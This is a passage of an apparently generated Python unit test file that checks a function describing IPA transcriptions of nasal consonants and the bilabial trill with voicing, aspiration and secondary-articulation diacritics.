# voiceless aspirated retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɳ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex nasal pulmonic egressive consonant
def test_ɳ_is_the_representation_of_the_voiced_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ")
self.assertEqual(actual, expected)
# voiced labialized retroflex nasal pulmonic egressive consonant
def test_ɳʷ_is_the_representation_of_the_voiced_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex nasal pulmonic egressive consonant
def test_ɳʲ_is_the_representation_of_the_voiced_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex nasal pulmonic egressive consonant
def test_ɳˠ_is_the_representation_of_the_voiced_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex nasal pulmonic egressive consonant
def test_ɳʰ_is_the_representation_of_the_voiced_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex nasal pulmonic egressive consonant
def test_ɳʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰʷ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex nasal pulmonic egressive consonant
def test_ɳʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰʲ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex nasal pulmonic egressive consonant
def test_ɳʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰˠ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰˤ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless velar nasal pulmonic egressive consonant
def test_ŋ̊_is_the_representation_of_the_voiceless_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊")
self.assertEqual(actual, expected)
def test_ŋ̥_is_the_representation_of_the_voiceless_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥")
self.assertEqual(actual, expected)
# voiceless labialized velar nasal pulmonic egressive consonant
def test_ŋ̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʷ")
self.assertEqual(actual, expected)
def test_ŋ̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized velar nasal pulmonic egressive consonant
def test_ŋ̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʲ")
self.assertEqual(actual, expected)
def test_ŋ̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar nasal pulmonic egressive consonant
def test_ŋ̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ˠ")
self.assertEqual(actual, expected)
def test_ŋ̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar nasal pulmonic egressive consonant
def test_ŋ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ˤ")
self.assertEqual(actual, expected)
def test_ŋ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar nasal pulmonic egressive consonant
def test_ŋ̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar nasal pulmonic egressive consonant
def test_ŋ_is_the_representation_of_the_voiced_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ")
self.assertEqual(actual, expected)
# voiced labialized velar nasal pulmonic egressive consonant
def test_ŋʷ_is_the_representation_of_the_voiced_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar nasal pulmonic egressive consonant
def test_ŋʲ_is_the_representation_of_the_voiced_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʲ")
self.assertEqual(actual, expected)
# voiced velarized velar nasal pulmonic egressive consonant
def test_ŋˠ_is_the_representation_of_the_voiced_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar nasal pulmonic egressive consonant
def test_ŋˤ_is_the_representation_of_the_voiced_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar nasal pulmonic egressive consonant
def test_ŋʰ_is_the_representation_of_the_voiced_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar nasal pulmonic egressive consonant
def test_ŋʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰʷ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar nasal pulmonic egressive consonant
def test_ŋʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰʲ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar nasal pulmonic egressive consonant
def test_ŋʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰˠ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar nasal pulmonic egressive consonant
def test_ŋʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰˤ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless uvular nasal pulmonic egressive consonant
def test_ɴ̊_is_the_representation_of_the_voiceless_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊")
self.assertEqual(actual, expected)
def test_ɴ̥_is_the_representation_of_the_voiceless_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular nasal pulmonic egressive consonant
def test_ɴ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʷ")
self.assertEqual(actual, expected)
def test_ɴ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular nasal pulmonic egressive consonant
def test_ɴ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʲ")
self.assertEqual(actual, expected)
def test_ɴ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular nasal pulmonic egressive consonant
def test_ɴ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ˠ")
self.assertEqual(actual, expected)
def test_ɴ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ˤ")
self.assertEqual(actual, expected)
def test_ɴ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular nasal pulmonic egressive consonant
def test_ɴ_is_the_representation_of_the_voiced_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ")
self.assertEqual(actual, expected)
# voiced labialized uvular nasal pulmonic egressive consonant
def test_ɴʷ_is_the_representation_of_the_voiced_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular nasal pulmonic egressive consonant
def test_ɴʲ_is_the_representation_of_the_voiced_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular nasal pulmonic egressive consonant
def test_ɴˠ_is_the_representation_of_the_voiced_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular nasal pulmonic egressive consonant
def test_ɴʰ_is_the_representation_of_the_voiced_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular nasal pulmonic egressive consonant
def test_ɴʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰʷ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized uvular nasal pulmonic egressive consonant
def test_ɴʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰʲ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular nasal pulmonic egressive consonant
def test_ɴʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰˠ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰˤ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless bilabial trill pulmonic egressive consonant
def test_ʙ̊_is_the_representation_of_the_voiceless_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊")
self.assertEqual(actual, expected)
def test_ʙ̥_is_the_representation_of_the_voiceless_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥")
self.assertEqual(actual, expected)
# voiceless labialized bilabial trill pulmonic egressive consonant
def test_ʙ̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʷ")
self.assertEqual(actual, expected)
def test_ʙ̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial trill pulmonic egressive consonant
def test_ʙ̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʲ")
self.assertEqual(actual, expected)
def test_ʙ̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial trill pulmonic egressive consonant
def test_ʙ̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ˠ")
self.assertEqual(actual, expected)
def test_ʙ̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial trill pulmonic egressive consonant
